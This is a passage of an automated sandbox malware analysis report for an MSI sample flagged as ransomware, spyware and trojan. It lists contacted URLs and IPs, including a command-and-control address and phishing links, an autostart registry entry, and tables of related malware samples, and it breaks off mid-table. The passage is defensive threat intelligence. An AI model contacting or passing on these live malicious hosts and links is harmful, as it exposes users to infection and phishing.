                                                http://geoplugin.net/json.gphytask.exe, 00000016.00000003.1640544536.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650331166.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647273159.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648907336.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648293959.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641987804.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640814728.000000000086C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646658676.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640250134.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1645514022.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648455258.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649057788.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1639168513.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647020161.0000000000869000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.imvu.comtask.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1656628346.00000000008ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cloudflare-dns.com/dns-querysvchost.exe, 0000001F.00000003.1695689800.000000000339F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnaymbsvchost.exe, 00000020.00000003.2169208927.000001BE856B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.imvu.comatask.exe, 0000001B.00000002.1656628346.00000000008ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nirsoft.nettask.exe, 00000018.00000002.1683843310.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachisvchost.exe, 0000001F.00000003.1695689800.000000000339F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://geoplugin.net/json.gp6task.exe, 00000016.00000003.1640544536.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650331166.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647273159.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648907336.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648293959.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641987804.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1686427068.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652161168.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651088954.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000002.4490232230.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640814728.000000000086C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1685975988.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646658676.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640250134.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.0000000000869000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comtask.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://127.01:svchost.exe, 00000020.00000003.1949101503.000001BE85629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.comtask.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.catcert.net/verarrelmsedge.exe, 00000026.00000002.1935253683.00001C0003170000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://geoplugin.net/json.gp/Ctask.exe, 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, task.exe, 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, task.exe, 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, task.exe, 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://127.0svchost.exe, 00000020.00000003.1949101503.000001BE85629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://geoplugin.net/json.gpNtask.exe, 00000016.00000003.1640544536.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650331166.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647273159.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648907336.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648293959.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641987804.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1686427068.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652161168.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651088954.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000002.4490232230.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640814728.000000000086C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1685975988.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646658676.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640250134.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.0000000000869000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnakernelbasentdllkernel32GetProcessMitigatisvchost.exe, 0000001F.00000002.1764768294.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.google.com/accounts/servicelogintask.exefalse
                                                                                  		high
                                                                                  https://login.yahoo.com/config/logintask.exefalse
                                                                                    		high
                                                                                    http://www.nirsoft.net/task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.ebuddy.comtask.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          179.43.171.196
                                                                                          		unknownPanama
                                                                                          		51852PLI-ASCHtrue
                                                                                          62.149.0.30
                                                                                          		ntp.time.in.uaUkraine
                                                                                          		15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                                          169.229.128.134
                                                                                          		ntp1.net.berkeley.eduUnited States
                                                                                          		25UCBUSfalse
                                                                                          129.6.15.28
                                                                                          		time-a-g.nist.govUnited States
                                                                                          		49US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfalse
                                                                                          193.171.23.163
                                                                                          		ts1.aco.netAustria
                                                                                          		1853ACONETACOnetBackboneATfalse
                                                                                          179.43.171.197
                                                                                          		rm.anonbaba.netPanama
                                                                                          		51852PLI-ASCHtrue
                                                                                          162.159.61.3
                                                                                          		unknownUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          61.205.120.130
                                                                                          		ntp.nict.jpJapan17511OPTAGEOPTAGEIncJPfalse
                                                                                          239.255.255.250
                                                                                          		unknownReserved
                                                                                          		unknownunknownfalse
                                                                                          178.237.33.50
                                                                                          		geoplugin.netNetherlands
                                                                                          		8455ATOM86-ASATOM86NLfalse
                                                                                          172.64.41.3
                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          Private

                                                                                          IP
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1560070
                                                                                          Start date and time:2024-11-21 11:25:33 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 13m 47s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Run name:Potential for more IOCs and behavior
                                                                                          Number of analysed new started processes analysed:45
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:wE1inOhJA5.msi
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:ff389718792f877fbdabe5cb02a1b3d5de5be988f9b5690250ffdf3409f04000.msi
                                                                                          Detection:MAL
                                                                                          Classification:mal100.rans.phis.troj.spyw.evad.winMSI@70/148@12/12
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 166
                                                                                          • Number of non-executed functions: 219
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .msi
                                                                                          • Close Viewer
                                                                                          • Override analysis time to 119996.6473 for current running targets taking high CPU consumption
                                                                                          • Override analysis time to 239993.2946 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.20, 17.253.52.125, 17.253.14.251, 17.253.14.125, 20.101.57.9, 158.220.97.17, 144.76.59.37, 85.220.190.246, 195.201.137.97, 142.250.74.195, 142.250.181.238, 142.250.110.84, 13.107.42.16, 142.250.185.142, 13.107.21.239, 204.79.197.239, 13.107.6.158
                                                                                          • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, twc.trafficmanager.net, clientservices.googleapis.com, clients2.google.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, time.g.aaplimg.com, l-0007.l-msedge.net, config.edge.skype.com, pool.ntp.org, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, time.apple.com, onedsblobprdwus15.westus.cloudapp.azure.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, business.bing.com, clients.l.google.com, dual-a-0036.a-msedge.net
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • VT rate limit hit for: wE1inOhJA5.msi

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          05:26:49API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                          05:27:26API Interceptor4187475x Sleep call for process: task.exe modified
                                                                                          05:27:43API Interceptor1x Sleep call for process: wmplayer.exe modified
                                                                                          10:26:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run apps C:\Users\user\apps.bat
                                                                                          10:26:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run apps C:\Users\user\apps.bat

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          162.159.61.3test2.exeGet hashmaliciousUnknownBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                              test2.exeGet hashmaliciousUnknownBrowse
                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                  original.emlGet hashmaliciousUnknownBrowse
                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                            WSock.dllGet hashmaliciousRamnitBrowse
                                                                                                              239.255.255.250https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                http://newvideozones.clickGet hashmaliciousUnknownBrowse
                                                                                                                  https://waydetrainers.us/PC.PDFGet hashmaliciousUnknownBrowse
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      https://cardpayment.microransom.us/XYmdKR004c2prdTQ3eFRYdTZlUlAwSGhsclU2V3JnMWpuZ2h3Njg2emV0U3ZLY1Z4RkpNZm9HbkpHck9SNjFHb01Yem5jSDVSb2RmaXRIWUNvN2g1UHR4NlNzM05yeWg0R2VJSzhzSFlRVTN6UFZHYWpZSUxBeXpsYmtPMjFua1J5RFlLdm5OUVBGRnl2UWRxSjhpUFRwL1VXS1RqNEJjMmJwNkVPOVkvV2o3S3R0MkYzS1VXOG5uS1hHVll2eDdUb3hmcGtBb2VBTUdHc3hweEtXV25WRVZKdDBwWCtVZGtobzFsamp3PS0tYVREdUlIcWNwNFJ5RjAxci0tQWs2bGpCejYzaGsxMWJqSll4TWFNQT09?cid=293298779Get hashmaliciousKnowBe4Browse
                                                                                                                        http://ahcli.comcastbiz.netGet hashmaliciousUnknownBrowse
                                                                                                                          96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            https://cabinetstogollc-my.sharepoint.com/:b:/g/personal/store802_cabinetstogo_com/EYepBlB4QExJsG0U-4jKG4ABoZxLg7rdp0_zjjwabbUc1g?e=q4iRIE&com.microsoft.intune.mam.appmdmmgtstate=2&com.microsoft.intune.mam.policysource=2&com.microsoft.intune.mam.identity=mcle%40novozymes.com&com.microsoft.intune.mam.policy=1&com.microGet hashmaliciousUnknownBrowse
                                                                                                                              https://account.metasystemchat.com/Get hashmaliciousUnknownBrowse
                                                                                                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                  129.6.15.28Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                    mirai_nomiGet hashmaliciousMiraiBrowse
                                                                                                                                      SecuriteInfo.com.Other.Malware-gen.28386.14039.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        SecuriteInfo.com.Other.Malware-gen.3200.4135.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          SecuriteInfo.com.Other.Malware-gen.31307.16494.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            SecuriteInfo.com.Linux.Siggen.6954.6684.13146.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              SecuriteInfo.com.Other.Malware-gen.22921.14172.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                PrHBHHWE5U.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    QP6s4u5SZ8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      178.237.33.50ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      • geoplugin.net/json.gp

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      time-a-g.nist.govPayload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      QP6s4u5SZ8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      2X3f1ykTmM.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      kr.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      WjmYak325l.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      F75rJPKdGb.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      ozJy5Zf5cf.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      tgduMePOh0.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      8AcNX5GzVY.exeGet hashmaliciousKronosBrowse
                                                                                                                                                      • 129.6.15.28
                                                                                                                                                      chrome.cloudflare-dns.comtest2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      test2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      WSock.dllGet hashmaliciousRamnitBrowse
                                                                                                                                                      • 162.159.61.3
                                                                                                                                                      geoplugin.netORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 178.237.33.50
                                                                                                                                                      USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      • 178.237.33.50

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      PLI-ASCHo4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 179.43.182.252
                                                                                                                                                      http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 81.17.20.50
                                                                                                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 179.43.180.122
                                                                                                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 179.43.180.122
                                                                                                                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 190.211.254.101
                                                                                                                                                      Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 190.211.254.192
                                                                                                                                                      file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                      • 81.17.25.195
                                                                                                                                                      SCV.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 179.43.180.122
                                                                                                                                                      SCV.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 179.43.180.122
                                                                                                                                                      http://179.43.168.146Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 179.43.168.146
                                                                                                                                                      US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSPayload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                                      • 132.163.96.1
                                                                                                                                                      T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 129.6.15.27
                                                                                                                                                      T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 132.163.96.2
                                                                                                                                                      Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 132.163.97.1
                                                                                                                                                      Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
